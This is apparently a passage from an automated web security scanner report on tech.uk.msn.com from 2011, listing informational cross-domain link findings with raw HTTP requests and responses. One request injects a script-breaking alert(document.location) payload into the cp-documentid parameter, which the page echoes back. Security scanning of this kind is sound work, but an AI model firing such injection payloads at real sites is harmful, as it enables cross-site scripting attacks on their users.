The page was loaded from a URL containing a query string:http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065c5a16%22%3balert(document.location)//ca93e79f28b The response contains the following links to other domains:http://advertising.microsoft.com/uk/home http://ccc01.opinionlab.com/o.asp?id=VYBJNodD http://connect.facebook.net/en_GB/all.js http://db2.stb00.s-msn.com/i/48/6CDE404B4BFEC334D023E5422081E0.gif http://db2.stb00.s-msn.com/i/DE/73EA3A497EB807310219A1C4D1E9E.gif http://db2.stb00.s-msn.com/i/F6/528E19AA57C59BD28F9241C1469F1.gif http://db2.stb01.s-msn.com/i/78/7CE57843948D6DF13E79A2DE4E15C.gif http://del.icio.us/submit?url=http://tech.uk.msn.com/features/photos.aspx&title= http://digg.com/submit?url=http://tech.uk.msn.com/features/photos.aspx http://go.microsoft.com/fwlink/?LinkId=74170 http://mail.live.com/ http://msn.careerbuilder.co.uk/?siteID=INT_UKMSN_HPLink&sc_extcmp=INT_UKMSN_HPLink http://msn.national-lottery.co.uk/ http://msnportaldev.112.2o7.net/b/ss/msnportaldev/1/H.1--NS/0 http://msnportaluktech.112.2o7.net/b/ss/msnportaluktech/1/H.1--NS/0 http://myweb2.search.yahoo.com/myresults/bookmarklet?u=http://tech.uk.msn.com/features/photos.aspx&t= http://portal.ebay.eu/msn-UK/ http://privacy.microsoft.com/en-gb/anti-spam.aspx?HTTP_HOST=privacy2.msn.com&url=/anti-spam/en-gb/default.aspx http://spaces.live.com/blogit.aspx?title=&sourceurl=http://tech.uk.msn.com/features/photos.aspx&description= http://twitter.com/home?status=add+this:+http://tech.uk.msn.com/features/photos.aspx http://twitter.com/msntech http://www.bing.com/maps/ http://www.facebook.com/msnuktech http://www.facebook.com/sharer.php?u=http://tech.uk.msn.com/features/photos.aspx&t= http://www.google.com/bookmarks/mark?op=add&bkmk=http://tech.uk.msn.com/features/photos.aspx&title=&labels= http://www.messengergonemobile.com/ http://www.myspace.com/modules/postto/pages/?u=http://tech.uk.msn.com/features/photos.aspx&t=&c= http://www.newsvine.com/_tools/seed&save?u=http://tech.uk.msn.com/features/photos.aspx&h= http://www.reddit.com/submit?url=http://tech.uk.msn.com/features/photos.aspx&title= http://www.stumbleupon.com/submit?url=http://tech.uk.msn.com/features/photos.aspx&title= http://www.technorati.com/faves?add=http://tech.uk.msn.com/features/photos.aspx http://www.twitter.com/MSNTechVerity http://www.twitter.com/msntechnik http://www.windowslive.co.uk/messenger?form=MWLMSS&publ=MSNHPTOP4&crea=SITEACQ_CIMS016009_Messenger_EN-GB_0x0_47618 https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1312376628&rver=6.1.6195.0&wp=LBI&wreply=http:%2F%2Ftech.uk.msn.com%2Ffeatures%2Fphotos.aspx%3Fcp-documentid%3D158635065c5a16%2522%253balert(document.location)%2F%2Fca93e79f28b&lc=2057&id=1184
Request
GET /features/photos.aspx?cp-documentid=158635065c5a16%22%3balert(document.location)//ca93e79f28b HTTP/1.1 Host: tech.uk.msn.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://tech.uk.msn.com/features/photos.aspx?cp-documentid=158635065c5a16%22%3balert(document.location)//ca93e79f28b Cookie: MUID=360F843730F542A7A6E2E0ACB7BADB9D; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; MC1=V=3&GUID=7a7a208d81b949fbb5590485cae7a32c; mh=MSFT; CC=US; Sample=43; s_vnum=1314963712630%26vn%3D1; s_nr=1312371839517; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 404 Not Found Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET S: DB3MPPRENA29 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Wed, 03 Aug 2011 13:03:48 GMT Cteonnt-Length: 96886 Content-Length: 96886 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-gb" lang="en-gb" xmlns="http://www.w3.org/1999/xhtml" xmlns:web="urn:sch...[SNIP]... </script><script type="text/javascript" src="http://connect.facebook.net/en_GB/all.js"> </script>...[SNIP]... <div><img src="http://msnportaluktech.112.2O7.net/b/ss/msnportaluktech/1/H.1--NS/0" alt="image beacon" rel="nofollow" /> </div>...[SNIP]... <li><a href="http://mail.live.com"> Hotmail</a>...[SNIP]... <li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1312376628&rver=6.1.6195.0&wp=LBI&wreply=http:%2F%2Ftech.uk.msn.com%2Ffeatures%2Fphotos.aspx%3Fcp-documentid%3D158635065c5a16%2522%253balert(document.location)%2F%2Fca93e79f28b&lc=2057&id=1184" class="dMSNME_1"> Sign in</a>...[SNIP]... <li class="first"><a href="http://mail.live.com"> <img src="http://db2.stb00.s-msn.com/i/F6/528E19AA57C59BD28F9241C1469F1.gif" width="25" height="20" alt="Envelope" /> <span>...[SNIP]... <li><a href="http://www.windowslive.co.uk/messenger?form=MWLMSS&publ=MSNHPTOP4&crea=SITEACQ_CIMS016009_Messenger_EN-GB_0x0_47618"> <img src="http://db2.stb00.s-msn.com/i/DE/73EA3A497EB807310219A1C4D1E9E.gif" width="25" height="20" alt="Two people figures" /> <span>...[SNIP]... <a href="http://uk.my.msn.com/"><img src="http://db2.stb00.s-msn.com/i/48/6CDE404B4BFEC334D023E5422081E0.gif" width="25" height="20" alt="Figure of person in front of computer monitor" /> <span>...[SNIP]... <a href="http://specials.uk.msn.com/msn_directory.aspx"><img src="http://db2.stb01.s-msn.com/i/78/7CE57843948D6DF13E79A2DE4E15C.gif" width="25" height="20" alt="Figure of arrow pointing to screen" /> <span>...[SNIP]... <li class="first"><a href="http://msn.careerbuilder.co.uk/?siteID=INT_UKMSN_HPLink&amp;sc_extcmp=INT_UKMSN_HPLink"> Careers & Jobs</a>...[SNIP]... <li class="last"><a href="http://portal.ebay.eu/msn-UK/"> eBay</a>...[SNIP]... <li class="first"><a href="http://www.bing.com/maps/"> Maps from Bing</a>...[SNIP]... <li><a href="http://www.messengergonemobile.com"> Mobile</a>...[SNIP]... <li class="first"><a href="http://msn.national-lottery.co.uk"> National Lottery</a>...[SNIP]... <noscript><img src=http://msnportaldev.112.2O7.net/b/ss/msnportaldev/1/H.1--NS/0 height="1" width="1" border="0" alt="" /> </noscript>...[SNIP]... <noscript><img src=http://msnportaldev.112.2O7.net/b/ss/msnportaldev/1/H.1--NS/0 height="1" width="1" border="0" alt="" /> </noscript>...[SNIP]... <li class="first jspopup"><a href="http://del.icio.us/submit?url=http://tech.uk.msn.com/features/photos.aspx&title=" title="Share this page on Del.icio.us" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/53/B85B6DFFC77EF9D86D931DDD3BDEC2.gif" width="16" height="16" alt="Share this page on Del.icio.us" />...[SNIP]... <li class=" jspopup"><a href="http://digg.com/submit?url=http://tech.uk.msn.com/features/photos.aspx" title="Share this page on Digg" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/28/77813148B142EF4F4DCEE7372FC215.jpg" width="16" height="16" alt="Share this page on Digg" />...[SNIP]... <li class=" jspopup"><a href="http://www.facebook.com/sharer.php?u=http://tech.uk.msn.com/features/photos.aspx&t=" title="Share this page on Facebook" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/FB/2B2C772B1EAFB0B6D239B186342DCD.gif" width="16" height="16" alt="Share this page on Facebook" />...[SNIP]... <li class=" jspopup"><a href="http://www.google.com/bookmarks/mark?op=add&bkmk=http://tech.uk.msn.com/features/photos.aspx&title=&labels=" title="Share this page on Google" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/7C/87B79F50DDC866686CE934324DC987.jpg" width="16" height="16" alt="Share this page on Google" />...[SNIP]... <li class=" jspopup"><a href="http://spaces.live.com/blogit.aspx?title=&sourceurl=http://tech.uk.msn.com/features/photos.aspx&description=" title="Share this page on Live Spaces" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/D2/FF2F70CAE8D665193EC71CE3ABE168.png" width="16" height="16" alt="Share this page on Live Spaces" />...[SNIP]... <li class=" jspopup"><a href="http://www.myspace.com/modules/postto/pages/?u=http://tech.uk.msn.com/features/photos.aspx&t=&c=" title="Share this page on MySpace" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/85/59DAE3AC143A3D9ECF2F375FBF1EBA.png" width="16" height="16" alt="Share this page on MySpace" />...[SNIP]... <li class=" jspopup"><a href="http://www.newsvine.com/_tools/seed&save?u=http://tech.uk.msn.com/features/photos.aspx&h=" title="Share this page on Newsvine" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/65/B9C2369C5C6C5BA049C34D1F79594.png" width="16" height="16" alt="Share this page on Newsvine" />...[SNIP]... <li class=" jspopup"><a href="http://www.reddit.com/submit?url=http://tech.uk.msn.com/features/photos.aspx&title=" title="Share this page on Reddit" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/EF/40D0FC9056526E4B5AD585674B335B.png" width="16" height="16" alt="Share this page on Reddit" />...[SNIP]... <li class=" jspopup"><a href="http://www.stumbleupon.com/submit?url=http://tech.uk.msn.com/features/photos.aspx&title=" title="Share this page on Stumbleupon" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/31/308235FD5523ECAFB8D864EAFCF570.gif" width="16" height="16" alt="Share this page on Stumbleupon" />...[SNIP]... <li class=" jspopup"><a href="http://www.technorati.com/faves?add=http://tech.uk.msn.com/features/photos.aspx" title="Share this page on Technorati" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/2E/5AF3E3DE428277901BD070D694686B.gif" width="16" height="16" alt="Share this page on Technorati" />...[SNIP]... <li class=" jspopup"><a href="http://twitter.com/home?status=add+this:+http://tech.uk.msn.com/features/photos.aspx" title="Share this page on Twitter" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/33/8C170158BB1EC51A16272BCD6F71C.gif" width="16" height="16" alt="Share this page on Twitter" />...[SNIP]... <li class="last jspopup"><a href="http://myweb2.search.yahoo.com/myresults/bookmarklet?u=http://tech.uk.msn.com/features/photos.aspx&t=" title="Share this page on Yahoo! My Web" onclick="return Msn.Navigation.OpenNew(event, this)"> <img src="http://estb.msn.com/i/B0/B5F992DCBB333A2421AAB18CB173.gif" width="16" height="16" alt="Share this page on Yahoo! My Web" />...[SNIP]... <li><a href="http://www.twitter.com/msntechnik"> <img src="http://estb.msn.com/i/A0/73EE55691874B316843CF17518A313.jpg" width="135" height="81" alt="Nik Taylor (MSN)" /></a><a href="http://www.twitter.com/msntechnik"> <strong>...[SNIP]... <li><a href="http://www.facebook.com/msnuktech"> <img src="http://estb.msn.com/i/FD/2BBE4796764D3FDC1D26FB8D4E691.jpg" width="135" height="81" alt="Follow us on Facebook (Facebook)" /></a><a href="http://www.facebook.com/msnuktech"> <strong>...[SNIP]... <li><a href="http://www.twitter.com/MSNTechVerity"> <img src="http://estb.msn.com/i/70/46399762CCCE49B80C97A5539134.jpg" width="135" height="81" alt="Verity Burns (MSN)" /></a><a href="http://www.twitter.com/MSNTechVerity"> <strong>...[SNIP]... <li class=" cb"><a href="http://twitter.com/msntech"> <img src="http://estb.msn.com/i/5B/35E8A67D7FFF85E13A4A729429ED6C.jpg" width="135" height="81" alt="Follow @msntech on Twitter (Twitter)" /></a><a href="http://twitter.com/msntech"> <strong>...[SNIP]... <li><a href="http://advertising.microsoft.com/uk/home"> Advertise</a></li><li><a href="http://go.microsoft.com/fwlink/?LinkId=74170"> Privacy</a></li><li class="last"><a href="http://privacy.microsoft.com/en-gb/anti-spam.aspx?HTTP_HOST=privacy2.msn.com&url=/anti-spam/en-gb/default.aspx"> Anti-Spam</a>...[SNIP]... <li><a href="http://ccc01.opinionlab.com/o.asp?id=VYBJNodD"> Report an Error</a>...[SNIP]...
2.5. http://tech.uk.msn.com/media/WeatherService.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://tech.uk.msn.com
Path:
/media/WeatherService.aspx
Issue detail
The page was loaded from a URL containing a query string:http://tech.uk.msn.com/media/WeatherService.aspx?wealocations=wc%3AUKXX0085&weadegreetype=C&culture=en-gb&rand=0.5203685015439987 The response contains the following links to other domains:http://advertising.microsoft.com/uk/home/ http://atsearch.autotrader.co.uk/msn/cars_search.asp? http://ccc01.opinionlab.com/o.asp?id=LMNvGbpU http://cd.ciao.co.uk/ http://db2.stb00.s-msn.com/i/48/6CDE404B4BFEC334D023E5422081E0.gif http://db2.stb00.s-msn.com/i/DE/73EA3A497EB807310219A1C4D1E9E.gif http://db2.stb00.s-msn.com/i/F6/528E19AA57C59BD28F9241C1469F1.gif http://db2.stb01.s-msn.com/i/78/7CE57843948D6DF13E79A2DE4E15C.gif http://download.live.com/photogallery/ http://dvd.ciao.co.uk/ http://go.microsoft.com/fwlink/?LinkId=74170 http://imagine-msn.com/messenger/launch/en-GB/?thisTour=acquisition http://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1265286563&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fpartner.uk.msn.com%2F404.aspx&lc=1033&id=1184 http://mail.live.com/ http://money.msn.taxbuddies.com/ http://msn.careerbuilder.co.uk/?siteID=INT_UKMSN_HPLink&sc_extcmp=INT_UKMSN_HPLink http://msn.golf365.com/ http://msn.national-lottery.co.uk/ http://msn.planetf1.com/ http://msnportalukhome.112.2o7.net/b/ss/msnportalukhome/1/H.1--NS/0 http://msnsport.skysports.com/cricket/0,19521,11066,00.html http://msnsport.skysports.com/football/0,19521,11065,00.html http://msnsport.skysports.com/rugbyunion/0,19521,11069,00.html http://msnukentertainment.spaces.live.com/ http://privacy.microsoft.com/en-gb/anti-spam.mspx http://static.jackpotjoy.com/upload/design/msnbingo/ http://www.bing.com/maps/ http://www.ciao.co.uk/ http://www.ciao.co.uk/Beauty_5302187_1 http://www.ciao.co.uk/Computers_5220723_1 http://www.ciao.co.uk/Electronics_5266511_1 http://www.ciao.co.uk/Fashion_Accessories_5302023_2-type-jewellery http://www.ciao.co.uk/Games_9225_1 http://www.ciao.co.uk/Household_Appliances_5266422_1 http://www.ciao.co.uk/Mobile_Phones_5302356_2 http://www.messengergonemobile.com/ http://www.msngamecentre.co.uk/Category.aspx?code=1007&genre=Puzzle&RefID=&Session=&orign=NavBar&ln=en&innerHeight=9265 http://www.msngamecentre.co.uk/Category.aspx?code=1008&genre=Word&RefID=&Session=&orign=NavBar&ln=en&innerHeight=1841 http://www.msngamecentre.co.uk/category.aspx?code=1001 http://www.tescodiets.com/b2b/msndiet/ http://www4.midasplayer.com/servlet/SelectServlet?partner=msn.uk.ob&lang=en
Request
GET /media/WeatherService.aspx?wealocations=wc%3AUKXX0085&weadegreetype=C&culture=en-gb&rand=0.5203685015439987 HTTP/1.1 Host: tech.uk.msn.com Proxy-Connection: keep-alive Referer: http://tech.uk.msn.com/media/articles.aspx?cp-documentid=154239335 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: application/xml, text/xml, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Sample=1; MC1=V=3&GUID=a03475b48b494e438954310bbcd4fbf8; MSNMOBMRKT=en-gb; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; countrycode=US; zipcode=75207; sample=1; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; IE9Overlay=0; IE9RemindMe=0; MUID=9D76DAC5D4D147139C18D454161BD61E; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expac=86II8A39_0214:C|; expid=id=559e0a35bc234a18a1b09d1bcfd6438e&bd=2011-08-03T12:59:51.572&v=2; mh=MSFT; CC=US; Sample=1; ebPanelFrequency_.uk.msn.com=6079530%3A2%3A1%3A1312462796548; SRCHHPGUSR=AS=1; s_cc=true; s_sq=msnportaluktech%3D%2526pid%253Dhttp%25253A//tech.uk.msn.com/reviews/%2526oid%253Dhttp%25253A//tech.uk.msn.com/phones/articles.aspx%25253Fcp-documentid%25253D158307155%2526ot%253DA
Response
HTTP/1.1 404 Not Found Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Last-Modified: Thu, 04 Feb 2010 12:30:03 GMT ETag: "f1af8bc695a5ca1:0" Server: Microsoft-IIS/7.5 STATUS_CODE: NotFound X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET S: DB3MPPRENA32 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Wed, 03 Aug 2011 13:00:42 GMT Cteonnt-Length: 22907 Content-Length: 22907 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-gb" lang="en-gb" xmlns="http://www.w3.org/1999/xhtml" xmlns:web="urn:sch...[SNIP]... <div><img src="http://msnportalukhome.112.2O7.net/b/ss/msnportalukhome/1/H.1--NS/0" height="1" width="1" alt="" /> </div>...[SNIP]... <li><a href="http://mail.live.com/"> Hotmail</a>...[SNIP]... <li class="last"><a href="http://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1265286563&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fpartner.uk.msn.com%2F404.aspx&lc=1033&id=1184" class="dMSNME_1"> Sign in</a>...[SNIP]... <li class="first"><a href="http://mail.live.com"> <img src="http://db2.stb00.s-msn.com/i/F6/528E19AA57C59BD28F9241C1469F1.gif" width="25" height="20" alt="Envelope" /> <span>...[SNIP]... <li><a href="http://imagine-msn.com/messenger/launch/en-GB/?thisTour=acquisition"> <img src="http://db2.stb00.s-msn.com/i/DE/73EA3A497EB807310219A1C4D1E9E.gif" width="25" height="20" alt="Two people figures" /> <span>...[SNIP]... <a href="http://uk.my.msn.com/"><img src="http://db2.stb00.s-msn.com/i/48/6CDE404B4BFEC334D023E5422081E0.gif" width="25" height="20" alt="Figure of person in front of computer monitor" /> <span>...[SNIP]... <a href="http://specials.uk.msn.com/msn_directory.aspx"><img src="http://db2.stb01.s-msn.com/i/78/7CE57843948D6DF13E79A2DE4E15C.gif" width="25" height="20" alt="Figure of arrow pointing to screen" /> <span>...[SNIP]... <li><a href="http://msn.careerbuilder.co.uk/?siteID=INT_UKMSN_HPLink&sc_extcmp=INT_UKMSN_HPLink"> Careers & Jobs</a>...[SNIP]... <li class="first"><a href="http://www.bing.com/maps/"> Maps from Bing</a>...[SNIP]... <li><a href="http://www.messengergonemobile.com"> Mobile</a>...[SNIP]... <li class="first"><a href="http://msn.national-lottery.co.uk"> National Lottery</a>...[SNIP]... <li class="sitemapfooterlinkitem"><a href="http://msnukentertainment.spaces.live.com/"> Celebrity gossip</a>...[SNIP]... <li class="sitemapfooterlinkitem"><a href="http://money.msn.taxbuddies.com/"> Tax</a>...[SNIP]... <li class="sitemapfooterlinkitem"><a href="http://atsearch.autotrader.co.uk/msn/cars_search.asp?"> Find a used car</a>...[SNIP]... <li class="sitemapfooterlinkitem"><a href="http://msnsport.skysports.com/football/0,19521,11065,00.html"> Football</a></li><li class="sitemapfooterlinkitem"><a href="http://msnsport.skysports.com/cricket/0,19521,11066,00.html"> Cricket</a></li><li class="sitemapfooterlinkitem"><a href="http://msnsport.skysports.com/rugbyunion/0,19521,11069,00.html"> Rugby Union</a>...[SNIP]... <li class="sitemapfooterlinkitem"><a href="http://msn.planetf1.com/"> Formula One</a>...[SNIP]... <li class="sitemapfooterlinkitem"><a href="http://msn.golf365.com/"> Golf </a>...[SNIP]... <li class="sitemapfooterlinkitem"><a href="http://msn.national-lottery.co.uk/"> National Lottery</a>...[SNIP]... <li class="sitemapfooterlinkitem"><a href="http://static.jackpotjoy.com/upload/design/msnbingo/"> Play Bingo</a></li><li class="sitemapfooterlinkitem"><a href="http://www.msngamecentre.co.uk/category.aspx?code=1001"> Free online games</a>...[SNIP]... <li class="sitemapfooterlinkitem"><a href="http://www4.midasplayer.com/servlet/SelectServlet?partner=msn.uk.ob&lang=en"> Cash games</a></li><li class="sitemapfooterlinkitem"><a href="http://www.msngamecentre.co.uk/Category.aspx?code=1007&genre=Puzzle&RefID=&Session=&orign=NavBar&ln=en&innerHeight=9265"> Puzzle games</a>...[SNIP]... <li class="sitemapfooterlinklast"><a href="http://www.msngamecentre.co.uk/Category.aspx?code=1008&genre=Word&RefID=&Session=&orign=NavBar&ln=en&innerHeight=1841"> Word games</a>...[SNIP]... <li class="sitemapfooterlinkfirst"><a href="http://www.ciao.co.uk/"> Shopping</a></li><li class="sitemapfooterlinkitem"><a href="http://www.ciao.co.uk/Beauty_5302187_1"> Beauty & Fragrance</a>...[SNIP]... <li class="sitemapfooterlinkitem"><a href="http://www.ciao.co.uk/Computers_5220723_1"> Clothing & Shoes</a>...[SNIP]... <li class="sitemapfooterlinkitem"><a href="http://www.ciao.co.uk/Computers_5220723_1"> Computers & Software</a>...[SNIP]... <li class="sitemapfooterlinkitem"><a href="http://dvd.ciao.co.uk/"> DVDs</a></li><li class="sitemapfooterlinkitem"><a href="http://www.ciao.co.uk/Electronics_5266511_1"> Electronics & Photo</a>...[SNIP]... <li class="sitemapfooterlinkitem"><a href="http://www.ciao.co.uk/Household_Appliances_5266422_1"> Household appliances</a>...[SNIP]... <li class="sitemapfooterlinkitem"><a href="http://www.ciao.co.uk/Fashion_Accessories_5302023_2-type-jewellery"> Jewellery</a></li><li class="sitemapfooterlinkitem"><a href="http://www.ciao.co.uk/Mobile_Phones_5302356_2"> Mobile Phones</a>...[SNIP]... <li class="sitemapfooterlinkitem"><a href="http://cd.ciao.co.uk/"> Music</a></li><li class="sitemapfooterlinklast"><a href="http://www.ciao.co.uk/Games_9225_1"> Video Games</a>...[SNIP]... <li class="sitemapfooterlinklast"><a href="http://download.live.com/photogallery/"> Download Photo gallery</a>...[SNIP]... <li class="sitemapfooterlinkitem"><a href="http://www.tescodiets.com/b2b/msndiet/"> Weight-loss tips</a>...[SNIP]... <li><a href="http://advertising.microsoft.com/uk/home/"> Advertise</a></li><li><a href="http://go.microsoft.com/fwlink/?LinkId=74170"> Privacy</a></li><li class="last"><a href="http://privacy.microsoft.com/en-gb/anti-spam.mspx"> Anti-Spam</a>...[SNIP]... <li><a href="http://ccc01.opinionlab.com/o.asp?id=LMNvGbpU"> Report An Error</a>...[SNIP]...
2.6. http://tech.uk.msn.com/media/articles.aspx
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://tech.uk.msn.com
Path:
/media/articles.aspx
Issue detail
The page was loaded from a URL containing a query string:http://tech.uk.msn.com/media/articles.aspx?cp-documentid=154239335 The response contains the following links to other domains:http://advertising.microsoft.com/uk/home http://ccc01.opinionlab.com/o.asp?id=VYBJNodD http://connect.facebook.net/en_GB/all.js http://db2.stb00.s-msn.com/i/48/6CDE404B4BFEC334D023E5422081E0.gif http://db2.stb00.s-msn.com/i/DE/73EA3A497EB807310219A1C4D1E9E.gif http://db2.stb00.s-msn.com/i/F6/528E19AA57C59BD28F9241C1469F1.gif http://db2.stb01.s-msn.com/i/78/7CE57843948D6DF13E79A2DE4E15C.gif http://go.microsoft.com/fwlink/?LinkId=74170 http://imagine-msn.com/messenger/launch/en-GB/?thisTour=acquisition http://mail.live.com/ http://msn.careerbuilder.co.uk/?siteID=INT_UKMSN_HPLink&sc_extcmp=INT_UKMSN_HPLink http://msn.national-lottery.co.uk/ http://msnportaluktech.112.2o7.net/b/ss/msnportaluktech/1/H.1--NS/0 http://photos.live.com/ http://portal.ebay.eu/msn-UK/ http://privacy.microsoft.com/en-gb/anti-spam.aspx?HTTP_HOST=privacy2.msn.com&url=/anti-spam/en-gb/default.aspx http://skydrive.live.com/ http://twitter.com/msntech http://twitter.com/share http://www.bing.com/browse?g=uk_mobile_phones&form=MSN104 http://www.bing.com/maps/ http://www.bing.com/search?q=Buy+Xbox+360+slim&form=MSN104 http://www.bing.com/search?q=Digital+camera&form=MSN104 http://www.bing.com/search?q=HD+Television&form=MSN104 http://www.bing.com/search?q=Laptops&form=MSN104 http://www.bing.com/search?q=internet+explorer+9&form=MSN104 http://www.bing.com/search?q=iphone&form=MSN104 http://www.bing.com/search?q=mobile+broadband&form=MSN104 http://www.bing.com/search?q=windows+phone+7&form=MSN104 http://www.facebook.com/msnuktech http://www.messengergonemobile.com/ http://www.twitter.com/MSNTechVerity http://www.twitter.com/msntechnik http://www.windowslive.co.uk/messenger?form=MWLMSS&publ=MSNHPTOP4&crea=SITEACQ_CIMS016009_Messenger_EN-GB_0x0_47618 https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1312376405&rver=6.1.6195.0&wp=LBI&wreply=http:%2F%2Ftech.uk.msn.com%2Fmedia%2Farticles.aspx%3Fcp-documentid%3D154239335&lc=2057&id=1184
Request
GET /media/articles.aspx?cp-documentid=154239335 HTTP/1.1 Host: tech.uk.msn.com Proxy-Connection: keep-alive Referer: http://tech.uk.msn.com/features/hands-on-google-chromebook User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: MC1=V=3&GUID=a03475b48b494e438954310bbcd4fbf8; MSNMOBMRKT=en-gb; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; countrycode=US; zipcode=75207; sample=1; MSNMOBREP=afad056e41a946b5b03a8aa5b78e5e1e; IE9Overlay=0; IE9RemindMe=0; MUID=9D76DAC5D4D147139C18D454161BD61E; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expac=86II8A39_0214:C|; expid=id=559e0a35bc234a18a1b09d1bcfd6438e&bd=2011-08-03T12:59:51.572&v=2; mh=MSFT; CC=US; Sample=1; ebPanelFrequency_.uk.msn.com=6079530%3A2%3A1%3A1312462796548; s_sq=msnportaluktech%3D%2526pid%253Dhttp%25253A//tech.uk.msn.com/features/hands-on-google-chromebook%2526oid%253Dhttp%25253A//tech.uk.msn.com/media/articles.aspx%25253Fcp-documentid%25253D154239335%2526ot%253DA; s_cc=true
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET S: DB3MPPRENA31 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Wed, 03 Aug 2011 13:00:04 GMT ntCoent-Length: 53322 Content-Length: 53322 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-gb" lang="en-gb" xmlns="http://www.w3.org/1999/xhtml" xmlns:web="urn:sch...[SNIP]... </link><script type="text/javascript" src="http://connect.facebook.net/en_GB/all.js"> </script>...[SNIP]... <div><img src="http://msnportaluktech.112.2O7.net/b/ss/msnportaluktech/1/H.1--NS/0" alt="image beacon" rel="nofollow" /> </div>...[SNIP]... <li><a href="http://mail.live.com"> Hotmail</a>...[SNIP]... <li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1312376405&rver=6.1.6195.0&wp=LBI&wreply=http:%2F%2Ftech.uk.msn.com%2Fmedia%2Farticles.aspx%3Fcp-documentid%3D154239335&lc=2057&id=1184" class="dMSNME_1"> Sign in</a>...[SNIP]... <li class="first"><a href="http://mail.live.com"> <img src="http://db2.stb00.s-msn.com/i/F6/528E19AA57C59BD28F9241C1469F1.gif" width="25" height="20" alt="Envelope" /> <span>...[SNIP]... <li><a href="http://www.windowslive.co.uk/messenger?form=MWLMSS&publ=MSNHPTOP4&crea=SITEACQ_CIMS016009_Messenger_EN-GB_0x0_47618"> <img src="http://db2.stb00.s-msn.com/i/DE/73EA3A497EB807310219A1C4D1E9E.gif" width="25" height="20" alt="Two people figures" /> <span>...[SNIP]... <a href="http://uk.my.msn.com/"><img src="http://db2.stb00.s-msn.com/i/48/6CDE404B4BFEC334D023E5422081E0.gif" width="25" height="20" alt="Figure of person in front of computer monitor" /> <span>...[SNIP]... <a href="http://specials.uk.msn.com/msn_directory.aspx"><img src="http://db2.stb01.s-msn.com/i/78/7CE57843948D6DF13E79A2DE4E15C.gif" width="25" height="20" alt="Figure of arrow pointing to screen" /> <span>...[SNIP]... <li class="first"><a href="http://msn.careerbuilder.co.uk/?siteID=INT_UKMSN_HPLink&amp;sc_extcmp=INT_UKMSN_HPLink"> Careers & Jobs</a>...[SNIP]... <li class="last"><a href="http://portal.ebay.eu/msn-UK/"> eBay</a>...[SNIP]... <li class="first"><a href="http://www.bing.com/maps/"> Maps from 